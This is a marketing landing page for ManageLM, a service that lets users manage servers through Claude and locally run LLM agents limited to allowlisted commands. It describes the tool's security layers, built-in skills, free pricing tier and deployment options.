How It Works Preview Security Skills Pricing Plugins Contact
Sign In Get Started
EN FR DE

Manage your servers
with natural language.

Tell Claude what you need. ManageLM agents execute it locally — using a privately-hosted LLM service, scoped to only the commands you allow. No SSH. No scripts. No risk.

Claude — ManageLM MCP Session
// You type natural language in Claude. That's it.

You: Run a security audit on all production servers and fix any critical findings

Claude: I'll audit all production servers and remediate critical issues.

  → Running Production__*__run_security_audit
    scope: "full"  |  8 agents queried

  ✓ Audit complete — 3 critical findings across 2 servers
   web-prod-02  CVE-2026-1234 — openssl 3.1.0 → 3.1.7 available
   db-prod-01   2 exposed ports — 9090, 6379 open to 0.0.0.0

  Patching openssl on web-prod-02…
  → Calling Production__web-prod-02__packages__upgrade
    package: "openssl"  |  version: "3.1.7"

You: Restrict those ports to the private network only

  → Calling Production__db-prod-01__network__firewall_update

Built on trusted foundations

Anthropic MCPClaudeOllamaPostgreSQLWebAuthn / FIDO2Ed25519OAuth 2.0 PKCEWebSocketFastifyTypeScript Anthropic MCPClaudeOllamaPostgreSQLWebAuthn / FIDO2Ed25519OAuth 2.0 PKCEWebSocketFastifyTypeScript
The Vision
The future of IT management.

No more rigid dashboards and scripts. The next era of infrastructure is conversational, intelligent, and secure by design.

Talk to your infrastructure

The future is natural conversations with your IT systems — voice or prompts, no more hard-coded interfaces. Just talk to an AI that distributes tasks to a fleet of autonomous sysop agents, each with their own intelligence and specialized skills.

Local + Cloud AI, the right way

One of the only platforms that combines local and cloud AI models correctly. Local agents handle routine jobs with full confidentiality — your data never leaves the server. Cloud AI provides the reasoning power when you need it.

How It Works
Three layers. Zero complexity.

From natural language to server execution in seconds — with every command validated and constrained.

STEP 01

Talk to Claude in plain English

Use the Claude app — the same AI you already know — to describe what you need. "Restart the app", "Check logs", "Update packages on all staging servers".

Natural language → MCP → Portal
Claude — MCP Y Restart nginx on web-01 C ✓ nginx restarted · active → services__restart {nginx} Y Check disk on all production
STEP 02

Portal authenticates & routes

The ManageLM portal verifies your identity via OAuth 2.0, checks permissions, identifies the target agent, and dispatches the task over a secure WebSocket channel.

Auth · RBAC · Skill validation · Routing
Cloud Portal Auth · RBAC · Skills · Routing AUTH RBAC SKILL WebSocket outbound web-01 nginx · docker 3 skills assigned db-01 postgresql 2 skills assigned app-01 services · files 4 skills assigned Zero inbound ports on any server
STEP 03

Agent executes locally with a local LLM

The lightweight agent uses Ollama (or any compatible LLM) in your infrastructure to interpret the task, generates commands, validates each one against the skill's allowlist, and executes. A single LLM server can serve all your agents. Sensitive data never leaves your network.

Local LLM · Command validation · Sandboxed
YOUR SERVER — DATA STAYS HERE AI Local LLM (Ollama) Interprets task → generates commands COMMAND ALLOWLIST Hard-enforced in code — not prompts $ systemctl restart nginx ✓ exit 0 120s limit 8KB cap
Preview
See it in action.

A clean, dark interface built for sysadmins who need clarity, speed, and full control.

app.managelm.com
ManageLM
Security
Security isn't a feature.
It's the architecture.

Every layer prevents unauthorized actions — even if the LLM hallucinates or faces prompt injection.

Command Allowlisting

Skills define explicit permitted commands. Every AI-generated command is validated in code. Anything outside is blocked.

Local LLM — Data Stays In Your Network

Task interpretation runs via a local Ollama instance shared across your infrastructure. Passwords, configs, logs — nothing leaves your network.

Read-Only by Default

Agents with no allowed_commands can only run read-only operations. Write access requires explicit config.

Zero Inbound Ports

Agents connect outward via WebSocket. Your servers never expose a port. No SSH, no VPN, no attack surface.

$

Secrets Hidden from AI

Secrets are env vars. The LLM only sees $VAR_NAME — actual values injected at execution time.

Ed25519 Signed Messages

Every portal-to-agent message is cryptographically signed. Agents reject unsigned or tampered messages — no command can be injected via the WebSocket.

Change Tracking & Revert

Every mutating task is git-snapshotted before and after. See exactly what changed, get the full diff, and one-click revert any task within 30 days.

Kernel Sandbox (Landlock + seccomp)

Opt-in Linux kernel confinement. Landlock restricts filesystem writes to allowed paths. seccomp-bpf blocks dangerous syscalls like mount and reboot. Even if a command passes all other checks, the kernel stops it.

Four-Layer Enforcement
1
Skill Scope
Enforced
2
Command Allowlist
Enforced
3
Destructive Guard
Enforced
4
Kernel Sandbox
Enforced
✓ LLM is untrusted by design

The AI generates commands, but every command is validated in code before execution. Prompt injection or hallucinations are blocked.

↻ Execution limits per task

Max 10 turns · 120s timeout · 8KB output cap. Every operation logged in a full audit trail.

Built-in Skills
31 skills. 230+ operations.

From systemd to Kubernetes, databases to VPNs — every skill is security-scoped with exact command allowlists.

Services11 ops
Web Server11 ops
NoSQL11 ops
Containers10 ops
Files10 ops
Email10 ops
Database9 ops
Kubernetes9 ops
Virtualization9 ops
Certificates8 ops
Message Queue8 ops
Users8 ops
Web Apps8 ops
Packages7 ops
Firewall7 ops
Monitoring7 ops
Security7 ops
Storage7 ops
Backup7 ops
Git7 ops
LDAP7 ops
Proxy7 ops
System7 ops
Network6 ops
DNS6 ops
Logs6 ops
File Sharing6 ops
VPN6 ops
Automation5 ops
LLM9 ops
Developer9 ops
+ Custom Skills with RAG Documentationunlimited
Each skill defines exact allowed commands — nothing more, nothing less
Built-in Intelligence
Security audits & system inventory.
Built in. One click.

Automated security scanning and full service discovery on every server — no skills required, no prompting. Just actionable results.

Security Audit

One-click security scan across 18 checks — SSH hardening, firewall rules, TLS ciphers, certificate expiry, SUID binaries, failed logins, Docker exposure, and more. AI-analyzed findings with severity ratings and actionable remediation.

  • Public vs. private server context
  • One-click automated remediation
  • PDF security report export

System Inventory

Discover every running service, installed package, container, database, and user account on your servers. AI-structured into categorized entries with automatic version detection.

  • 12 service categories
  • Automatic package version extraction
  • Fleet-wide PDF inventory export
Why ManageLM
Not just another management tool.

The only platform combining AI automation with hard-enforced security.

CapabilityManageLMSSH + ScriptsAnsible / PuppetGeneric AI
Natural language interface
Command allowlisting (hard-enforced)✓ In code~ Limited
Private LLM (data in your network)N/AN/A✗ Cloud only
Zero inbound ports✗ Port 22✗ SSH~ Varies
No learning curve✓ Just talk✗ Bash✗ YAML
Skill-scoped security✗ Full access~ Roles
Kernel sandbox (Landlock/seccomp)
Full audit trail~ Manual
Multi-tenant RBAC~ Limited
Built-in security audits✓ + remediation
Pricing
100% free. No catches.

Every feature, every integration, every skill — completely free for up to 10 agents. No credit card. No time limit.

FREE FOREVER
$0/month
Up to 10 agents — all features unrestricted
  • All 31 built-in skills
  • 230+ operations
  • Multi-tenant teams & RBAC
  • Server groups
  • Scheduled tasks
  • Webhooks & API keys
  • Full audit trail
  • Passkeys & MFA
  • Trial LLM included
  • Local LLM support
  • Security audits & inventory
Get Started Free →

No credit card required · No feature gates · Full platform access

PRO & ENTERPRISE

Need more agents?

Scale beyond 10 agents with flexible plans for growing teams and enterprises.

  • Unlimited agents
  • Priority support
  • Custom onboarding
  • Volume discounts
View Plans →
Deploy
Deploy your way.

Start with our managed cloud in seconds, or self-host on your own infrastructure with Docker.

ManageLM Cloud

Managed SaaS — start in minutes

  • Free for up to 10 agents
  • Fully managed infrastructure
  • Automatic updates
  • Trial LLM included
Get Started →

ManageLM Self-Hosted

Run on your infrastructure

  • Full data sovereignty
  • Docker Compose deployment
  • Proxied LLM — centralized API keys
  • No external dependencies
View Docker Setup →
Platform
Everything you need at scale.

Multi-Tenant Teams

Owner, admin, member roles with granular permissions. Invite teammates, scope access per server or group.

Server Groups

Organize agents into groups. Run operations across entire groups with a single request.

Scheduled Tasks

Cron-based schedules for backups, log rotation, health checks — all automated.

Webhooks & API Keys

Real-time notifications on events. Full REST API for integration into existing workflows.

Full Audit Trail

Every action logged with timestamps, IPs, and full context. Complete accountability.

Passkeys & MFA

WebAuthn/FIDO2 passwordless login. Multi-factor auth and IP whitelisting for MCP.

Ready to manage servers
the intelligent way?

100% free for up to 10 agents — every feature included. Self-host with Docker for full control. Deploy in under 5 minutes.

Contact
Get in touch.

Questions, demos, or enterprise needs? We'd love to hear from you.

Response Time

We typically respond within 24 hours on business days.

Email client opened!

Please send the email from your mail application to complete the message.